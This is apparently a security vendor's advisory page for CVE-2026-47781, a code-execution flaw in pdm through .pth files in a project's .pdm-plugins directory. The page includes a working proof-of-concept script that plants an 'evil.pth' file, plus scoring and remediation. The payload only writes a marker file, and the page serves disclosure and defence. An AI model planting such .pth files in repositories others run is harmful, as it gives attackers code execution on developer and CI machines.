CVE-2026-47781

CVE-2026-47781 is a high-severity code injection vulnerability in pdm (pip), affecting versions <= 2.26.9. It is fixed in 2.27.0.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

PDM: Project-Controlled .pdm-plugins Content Executes Before CLI Parsing

PDM automatically loads project-local plugin paths from .pdm-plugins during Core initialization. Because this path is added via site.addsitedir(), attacker-controlled .pth files inside the project plugin directory are processed and can execute Python code before normal CLI handling begins.

This allows arbitrary code execution with the privileges of the user running pdm from an untrusted repository checkout.

Affected Behavior

  • Trigger does not require pdm install --plugins
  • A low-impact command such as pdm --version is sufficient
  • Impact is strongest in CI, privileged shells, and automation contexts

Affected Code

  • src/pdm/core.py:74-82
  • src/pdm/core.py:310-333
  • src/pdm/core.py:335-352

Technical Details

Core.__init__() calls load_plugins() before ordinary command execution. load_plugins() calls _add_project_plugins_library(), which derives the project-local .pdm-plugins library path and adds it through site.addsitedir().

On CPython, site.addsitedir() processes .pth files found in the added directory. .pth lines beginning with import are executed immediately. This creates a trust-boundary break: project-controlled files execute before the user explicitly opts into plugin installation or plugin loading.

Reproduction

PoC:

# Replace this with a Python interpreter that can run `python -m pdm`.
PDM_PY=/path/to/python-with-pdm
tmpdir=$(mktemp -d)

cat > "$tmpdir/pyproject.toml" <<'EOF'
[project]
name = "plugin-autoload-demo"
version = "0.0.1"
EOF

purelib=$(TMPDIR_ROOT="$tmpdir/.pdm-plugins" "$PDM_PY" - <<'PY'
import os
import sys
import sysconfig

base = os.environ["TMPDIR_ROOT"]
scheme_names = sysconfig.get_scheme_names()
if (sys.platform == "darwin" and "osx_framework_library" in scheme_names) or sys.platform == "linux":
    scheme = "posix_prefix"
elif sys.version_info < (3, 10):
    scheme = "nt" if os.name == "nt" else "posix_prefix"
else:
    scheme = sysconfig.get_default_scheme()
replace_vars = {"base": base, "platbase": base}
print(sysconfig.get_path("purelib", scheme, replace_vars))
PY
)

mkdir -p "$purelib"
marker="$tmpdir/plugin-autoload-marker.txt"
printf '%s\n' "import pathlib; pathlib.Path(r'$marker').write_text('project plugin autoload executed', encoding='utf-8')" > "$purelib/evil.pth"

(
  cd "$tmpdir" &&
  "$PDM_PY" -m pdm --version
)

cat "$marker"

Expected result:

  • A temporary project is created
  • An evil.pth file is placed under .pdm-plugins
  • Running pdm --version creates a marker file before CLI exit

Observed output from local validation:

PDM, version 2.26.9

--- marker ---
project plugin autoload executed

Severity

High

CVSS v4.0

  • Base score: 8.4 (High)
  • Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Rationale:

  • AV:L: exploitation occurs through local execution of pdm against attacker-controlled repository content
  • AC:L: no special bypass or race is required
  • AT:N: no external precondition beyond the vulnerable workflow is required
  • PR:N: the attacker does not need privileges on the victim host
  • UI:A: the victim must actively run a pdm command in the malicious checkout
  • VC:H/VI:H/VA:H: successful exploitation yields arbitrary code execution as the invoking user
  • SC:N/SI:N/SA:N: the score is kept to same-system impact only

Root Cause

Project-local plugin paths are implicitly trusted and loaded too early, and .pth processing is inherited from site.addsitedir().

Recommended Remediation

  • Do not auto-load project-local .pdm-plugins by default
  • Avoid site.addsitedir() for project-controlled plugin paths
  • If project plugins must be supported, require explicit opt-in such as --enable-project-plugins
  • Explicitly prevent .pth execution when loading project plugin paths

Disclosure Notes

This issue is a strong standalone CVE candidate because it yields direct code execution from repository-controlled files without requiring the victim to run a project script explicitly.

Impact

  • Arbitrary code execution as the invoking user
  • Potential credential theft, persistence, or workspace tampering
  • Potential privilege escalation when pdm is run via sudo, root-owned CI jobs, or privileged service accounts

Untrusted input is evaluated as executable code within the application's runtime environment. Typical impact: arbitrary code execution within the application's privilege context.

Affected versions

pdm (<= 2.26.9)

Security releases

pdm → 2.27.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade pdm to 2.27.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-47781? CVE-2026-47781 is a high-severity code injection vulnerability in pdm (pip), affecting versions <= 2.26.9. It is fixed in 2.27.0. Untrusted input is evaluated as executable code within the application's runtime environment.
  2. Which versions of pdm are affected by CVE-2026-47781? pdm (pip) versions <= 2.26.9 is affected.
  3. Is there a fix for CVE-2026-47781? Yes. CVE-2026-47781 is fixed in 2.27.0. Upgrade to this version or later.
  4. Is CVE-2026-47781 exploitable, and should I be worried? Whether CVE-2026-47781 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-47781 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-47781? Upgrade pdm to 2.27.0 or later.

Other vulnerabilities in pdm

Stop the waste.
Protect your environment with Kodem.